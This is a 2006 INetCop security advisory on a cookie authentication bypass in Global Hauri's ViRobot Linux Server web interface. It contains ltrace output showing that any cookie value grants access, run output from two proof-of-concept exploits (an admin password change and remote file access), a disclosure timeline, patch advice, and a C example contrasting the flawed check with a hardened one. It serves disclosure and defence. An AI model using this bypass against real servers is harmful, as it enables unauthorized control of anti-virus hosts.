
[INetCop Security Advisory] Global Hauri Virobot cookie exploit



        ========================================
        INetCop Security Advisory #2006-0x82-028
        ========================================


* Title: Global Hauri Virobot cookie exploit


0x01. Description


ViRobot Unix/Linux Server is an anti-virus product developed by Global Hauri
(sold for Sun SPARC, HP and IBM Unix platforms and for Red Hat Linux).
Before a user can scan the server for viruses and clean it,
he must log in to ViRobot's dedicated web server.
That web server is based on Apache and provides the web interface
through CGI programs bundled with the product.

The problem with this product is that many of its CGI programs
do not verify the user's state through the cookie issued at login:
the presence of any HTTP_COOKIE value is enough.
This is a critical authentication vulnerability. As a result,
a malicious attacker can obtain the user id and password,
and can use the server without logging in.

test: --

[root@Intel-x86-platform cgi-bin]# pwd
/usr/local/ViRobot/cgi-bin
[root@Intel-x86-platform cgi-bin]# ./filescan
Content-type:text/html

<font size=2>You need to authenticate.</font>
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
__libc_start_main(0x08048c20, 1, 0xbffffbe4, 0x080488b4, 0x0804c3cc <unfinished ...>
__register_frame_info(0x0804f010, 0x0804f188, 0xbffffba4, 0x080488d9, 0x4010748c) = 0x40107fc0
printf("Content-type:text/html\n\n")              = 24
...
getenv("REMOTE_ADDR")                             = NULL
memset(0xbffff729, '\000', 511)                   = 0xbffff729
memset(0xbffff6e9, '\000', 63)                    = 0xbffff6e9
uname(0xbfffd558)                                 = 0
gethostbyname("Intel-x86-platform")               = 0x40109f04
inet_ntoa(0x0100007f)                             = "127.0.0.1"
strncpy(0xbfffd4d8, "127.0.0.1", 127)             = 0xbfffd4d8
getenv("HTTP_COOKIE")                             = NULL   // HTTP_COOKIE must be set.
atoi(0x0804c4f6, 0x0804c4f6, 0, 0xbffffb5c, 0x0804bf1a) = 3
strcmp("#COM-0003;", "#FSC-0003;")                = -3
strcmp("#COM-0003;", "#COM-0003;")                = 0
printf("<font size=2>%s</font>\n", "You need to authenticate.") = 46
exit(1)                                           = <void>
__deregister_frame_info(0x0804f010, 0xbffffb48, 0x0804c3e1, 0x4010748c, 0xbffffb5c) = 0x0804f188
+++ exited (status 1) +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export HTTP_COOKIE=test   // Set an arbitrary HTTP_COOKIE value.
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
...
getenv("REMOTE_ADDR")                             = NULL
memset(0xbffff709, '\000', 511)                   = 0xbffff709
memset(0xbffff6c9, '\000', 63)                    = 0xbffff6c9
uname(0xbfffd538)                                 = 0
gethostbyname("Intel-x86-platform")               = 0x40109f04
inet_ntoa(0x0100007f)                             = "127.0.0.1"
strncpy(0xbfffd4b8, "127.0.0.1", 127)             = 0xbfffd4b8
getenv("HTTP_COOKIE")                             = "test"
getenv("HTTP_COOKIE")                             = "test"
strncmp("test", "ViRobot_ID", 10)                 = 30
strncmp("test", "ViRobot_PASS", 10)               = 30
// This shows that ViRobot_ID and ViRobot_PASS are the names the program looks for in the cookie.
...
...     // Execution continues even though the cookie value matches neither name.
...
getenv("REQUEST_METHOD")                          = NULL   // REQUEST_METHOD must be set.
strcmp(NULL, "POST" <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export REQUEST_METHOD=GET   // Set REQUEST_METHOD.
[root@Intel-x86-platform cgi-bin]# ./filescan | more
Content-type:text/html

        <html>
        <head>
                <title>ViRobot Linux Server Ver 2.0</title>
...
                                                        <select name=dirs class='width-full' size=8 onchange='javascript:document.dir_form.submit()'>
                                                        <OPTION value="/.">.</OPTION>
                                                        <OPTION value="/..">..</OPTION>
                                                        <OPTION value="/etc">etc/</OPTION>
                                                        <OPTION value="/boot">boot/</OPTION>
...
                                <form name=web_vrscan method=post action=webvrscan target=new>
                                <td align=right valign=top>
                                        <input type=image src='/images/button_scan.gif' border=0><input type=hidden name=web>
                                </td>
                                </form>
                        </tr>
                </table>
        </body>
        </html>
[root@Intel-x86-platform cgi-bin]#

As the output above shows, with an unrelated cookie value
I could easily retrieve the screens the administrator uses after logging in.

--


0x02. Vulnerable Packages


Vendor site:
Global HAURI Inc. - http://www.globalhauri.com/ (US & Canada)
HAURI ASIA Pte Ltd. - http://www.hauri.com.sg/ (Singapore)
HAURI JAPAN Inc. - http://www.hauri.co.jp/ (Japan)
China Blue Star Hauri Technology Co., Ltd. - http://www.hauri.com.cn/ (China)
HAURI Latinoamerica S.A. - http://www.haurilatin.com/ (Latin/Mexico)
Hauri do Brazil - http://www.haurilatin.com/ (Latin/Brazil)
Hauri Europe GmbH - http://www.hauri-europe.com/ (Europe)
HAURI Inc. - http://www.hauri.co.kr/ (Korea)

Virobot Linux Server
-eng-linux_i386-eval-20050817.tar
+Turbo 6x/7x, Laser 5/6x/7x, Miracle 2x, Redhat 6x/7x
Virobot Unix Server

Disclosure Timeline:
2003-08.??: Vulnerabilities found.
2003-08.??: 1st vendor contact. (no response)
2005-09.30: 2nd vendor contact. (no response)
2005-10.03: 3rd vendor contact. (no response)
2005-10.08: Vendor removed the free download page. (Oops.)
2006-02.17: 4th vendor contact. (no response)
2006-02.22: Public disclosure.


0x03. Exploit


We have two proof-of-concept codes for these bugs.

#1. Virobot web administrator password change exploit:

--
[root@Intel-x86-platform virobot]# head 0x82-viropass.c
/*
**
** 0x82-viropass - Virobot password change exploit (ver2003)
**
** Our INetCop Security Team first found this bug in 2003.
** At that time the vendor, Global Hauri, did not react at all.
**
** Unfortunately announced only now. (This bug slept for 2 years.)
**
** exploit result:
[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-viropass localhost 8080 x82 hax0r

 0x82-viropass - Virobot password change exploit (ver2003)

 *********************************************************
 ** This exploit code is may change your virobot server **
 ** administrator id and password.                      **
 *********************************************************

 [1] Set socket.
 [2] Send code.
 [*] Ok, modify admin information. (id: x82, passwd: hax0r)
 [*] exploit successfully.
 [*] Antivirus lose!

[root@Intel-x86-platform virobot]#
--

#2. Virobot remote directory file access exploit:

--
[root@Intel-x86-platform virobot]# head 0x82-virofuk.c
/*
**
** Virobot cookie bug remote exploit (v0.2) [Proof of Concept]
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@xxxxxxxxxxx>.
** My World: http://x82.inetcop.org
**
*/

[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-virofuk localhost 8080

 Virobot cookie bug remote exploit [Proof of Concept]

 [1] Set socket.
 [2] Send code.
 [3] Take and is storing substance.
 [*] Save file name: result.htm
 [*] Please wait for a moment ... [OK]
 [*] Read result.htm file contents.

[root@Intel-x86-platform virobot]# ls result.htm
result.htm
[root@Intel-x86-platform virobot]#
--

An attacker can mount remote attacks through these critical problems.


0x04. Patch


The problem affects every CGI program that can be used without a valid
cookie value.
Each of them must be given a function or module that always checks
the cookie value presented by the user.
Until the vendor releases a patch, a temporary workaround is to use a
firewall or iptables so that only the administrator's IP address
can reach the relevant web pages.
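To make the failure concrete, here is an added example (written for this page; it is neither ViRobot's code nor the PoC source) that reproduces the decision visible in the ltrace output of section 0x01 and places beside it the kind of cookie check section 0x04 asks for. The cookie name ViRobot_SESSION, the stored token value and the sample Cookie headers are assumptions constructed for the example; the real product's session handling is not described in this advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed for this example only: a session cookie name and one valid
 * server-side session token. The real product's session store is unknown. */
#define SESSION_COOKIE "ViRobot_SESSION"
static const char VALID_SESSION[] = "6f1c2a9e0d4b5a7c";

/* Copy the value of cookie `name` out of a Cookie header such as
 * "a=1; ViRobot_SESSION=abc; b=2". Returns 1 on success, 0 if the cookie
 * is absent or its value does not fit in `out`. */
int cookie_get(const char *header, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p;

    if (header == NULL)
        return 0;
    for (p = header; *p != '\0'; ) {
        while (*p == ' ' || *p == ';')            /* skip separators */
            p++;
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            size_t vlen = strcspn(v, ";");        /* value runs to the next ';' */
            if (vlen >= outlen)
                return 0;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 1;
        }
        p += strcspn(p, ";");                     /* skip this cookie entirely */
    }
    return 0;
}

/* Compare two strings without an early exit on the first mismatching byte. */
static int consttime_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b), n = la < lb ? la : lb, i;
    unsigned char diff = (unsigned char)(la != lb ? 1 : 0);

    for (i = 0; i < n; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* The behaviour seen in the trace: the program only requires HTTP_COOKIE
 * to be set. It compares the value against the cookie names but never acts
 * on the result, so "test" is as good as a real login cookie. */
int vulnerable_is_authenticated(const char *http_cookie)
{
    if (http_cookie == NULL)
        return 0;                                 /* "You need to authenticate." */
    (void)strncmp(http_cookie, "ViRobot_ID", 10);
    (void)strncmp(http_cookie, "ViRobot_PASS", 10);
    return 1;                                     /* reached whatever the compares returned */
}

/* Hardened check: a random session token issued at login must be present in
 * the cookie and must match the server-side store. The id and password
 * themselves never travel in the cookie. */
int hardened_is_authenticated(const char *http_cookie)
{
    char token[64];

    if (!cookie_get(http_cookie, SESSION_COOKIE, token, sizeof token))
        return 0;
    return consttime_equal(token, VALID_SESSION);
}

int main(void)
{
    /* Constructed sample Cookie headers, including the "test" value from the trace. */
    const char *samples[] = {
        NULL,
        "test",
        "ViRobot_ID=admin; ViRobot_PASS=secret",
        "ViRobot_SESSION=6f1c2a9e0d4b5a7c",
        "ViRobot_SESSION=0000000000000000",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("cookie=%-40s vulnerable=%d hardened=%d\n",
               samples[i] ? samples[i] : "(unset)",
               vulnerable_is_authenticated(samples[i]),
               hardened_is_authenticated(samples[i]));
    return 0;
}
```

Run stand-alone, the program prints one line per sample: the vulnerable check accepts every non-empty cookie, while the hardened check accepts only the header carrying the valid session token. The token must be compared against server-side state; a check that merely confirms the cookie names are present, as the trace suggests the CGI does, is no stronger than no check at all.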

--
Thank you.

P.S.: Sorry for my poor English.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org
             My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--


